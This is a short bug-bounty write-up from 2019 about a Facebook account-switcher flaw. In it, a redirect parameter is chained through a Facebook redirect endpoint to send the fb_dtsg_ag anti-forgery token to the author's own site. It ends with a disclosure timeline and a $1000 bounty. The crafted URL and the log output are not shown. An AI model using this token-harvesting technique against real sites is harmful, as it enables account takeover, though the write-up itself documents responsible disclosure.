Stealing Side-Channel Attack Tokens in Facebook Account Switcher

Max Pasqua
Jan 4, 2019 · 2 min read

After receiving an email from facebook that somebody requested to join my group I decided to open the link in a different account to see the results. I was brought to the “account switcher” page that looks like this.

Upon hitting continue it would normally log you out and prompt you to log in on the new account. But in the url for the account switcher there was a next paramater controlling where to go after hitting continue. On top of being able to control where the request goes, it also appends a fb_dtsg_ag token (the token used to prevent side-channel attacks on facebook).

The next task was to somehow find a a way to steal the tokens once the user hits continue. My main goal was to get the token to redirect to where I could harvest the token using an embedded iframe to pull the data from the url. The only problem was the next paramater didn’t support subdomains so it could only redirect to Luckily enough facebook has an endpoint where you can put any facebook domain after the ? and it will redirect. After a little bit of url encoding the final URL looked like this

I clicked continue, and then checked my websites log file to see this



Submitted- December 7th, 2018

Triaged- December 10th, 2018

Team Asks for Verification on fix- January 3rd, 2019

Bounty Awarded($1000)- January 4th, 2019

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store